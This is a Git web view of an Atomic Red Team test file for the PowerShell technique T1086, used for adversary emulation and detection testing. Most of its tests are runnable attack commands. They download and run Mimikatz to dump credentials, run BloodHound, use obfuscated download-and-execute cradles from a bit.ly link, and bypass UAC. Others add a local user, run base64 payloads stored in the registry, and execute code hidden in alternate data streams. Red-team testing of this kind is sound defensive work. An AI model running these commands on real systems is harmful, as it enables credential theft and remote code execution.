security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1663bf7d524b6fc8a9a39104feb2949b36368dfc
atomic-red-team/atomics/T1086/T1086.yaml
T
dwhite9 7028b8b444 BugFix and Enhancement for T1086-12 (#593) 
* Adding T1086 Alternate Data Stream atomic

* Added newline T1086

* Syncing changes with updstream and origin.

* Added Cleanup to Logon Scripts Atomic T1037

* Added timout to allow time for detection logic to register change.

* Fixed issue with upstream sync,  Re-added timout to allow time for detection logic.

* Fixed cleanup command. Yaml tag not working to allow it to run.

* Update T1158 test 11. 

Corrected ADS syntax. Added loop to run embedded ADS command from shell. Also added cleanup code.

* Update T1037.yaml

Moved Reg delete command under the cleanup_command tag for consistency.

* Update T1037.yaml

Moved reg removal command under cleanup_command tag for consistency.

* Update T1086.yaml

Bug Fix: Updated Base64 encoded command in T1086-12 with correct syntax and environment variables for power shell compatibility (was for cmd.exe only). Original decoded payload referenced %SystemRoot%, whereas PowerShell uses $env:SystemRoot. Also replaced single quotes with double quotes to prevent PowerShell from interpreting it as a literal string.

Enhancement: Added Cleanup_commands for T1086-12. Added comments for what the Base64 encoded payload is.
2019-10-24 10:13:16 -07:00

272 lines
11 KiB
YAML
Raw Blame History

---
attack_technique: T1086
display_name: PowerShell
atomic_tests:
- name: Mimikatz
description: |
Download Mimikatz and dump credentials
supported_platforms:
- windows
input_arguments:
mimurl:
description: Mimikatz url
type: url
default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
executor:
name: command_prompt
elevation_required: true
command: |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
- name: BloodHound
description: |
Download Bloodhound and run it
supported_platforms:
- windows
input_arguments:
bloodurl:
description: BloodHound URL
type: url
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1
executor:
name: command_prompt
elevation_required: false
command: |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
- name: Obfuscation Tests
description: |
Different obfuscated methods to test
Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
- name: Mimikatz - Cradlecraft PsSendKeys
description: |
Run mimikatz via PsSendKeys
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: |
$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
- name: Invoke-AppPathBypass
description: |
Note: Windows 10 only
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
- name: PowerShell Add User
description: |
Using PS 5.1, add a user via CLI
supported_platforms:
- windows
input_arguments:
user_name:
description: username to add
type: string
default: atomic_user
full_name:
description: Full name of user
type: string
default: Atomic Red Team
password:
description: password to use
type: string
default: ATOM1CR3DT3@M
description:
description: Brief description of account
type: string
default: Atomic Things
executor:
name: powershell
elevation_required: true
command: |
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
- name: Powershell MsXml COM object - no prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
executor:
name: command_prompt
elevation_required: false
command: |
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
- name: Powershell MsXml COM object - with prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
executor:
name: command_prompt
elevation_required: false
command: |
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
- name: Powershell XML requests
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell xml download request
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml
executor:
name: command_prompt
elevation_required: false
command: |
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
- name: Powershell invoke mshta.exe download
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell invoke mshta to download payload
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct
executor:
name: powershell
elevation_required: false
command: |
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
- name: Powershell Invoke-DownloadCradle
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
supported_platforms:
- windows
executor:
name: manual
steps: |
1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
- name: PowerShell Fileless Script Execution
description: |
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
REM Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
cleanup_command: |
del /Q /F %SystemRoot%\Temp\art-marker.txt
REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
- name: PowerShell Downgrade Attack
description: |
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
prereq_command: |
if(2 -in $PSVersionTable.PSCompatibleVersions.Major){0}else{1}
command: |
powershell.exe -version 2 -Command Write-Host $PSVersion
- name: NTFS Alternate Data Stream Access
description: |
Creates a file with an alternate data stream and simulates executing that hidden code/file
supported_platforms:
- windows
input_arguments:
ads_file:
description: File created to store Alternate Stream Data
type: String
default: $env:TEMP\NTFS_ADS.txt
executor:
name: powershell
elevation_required: false
prereq_command: | # Checks to verify that $env:HOMEDRIVE is an NTFS drive
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS"){0}else{1}
command: |
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
cleanup_command: |
Remove:Item #{ads_file}
Reference in New Issue View Git Blame Copy Permalink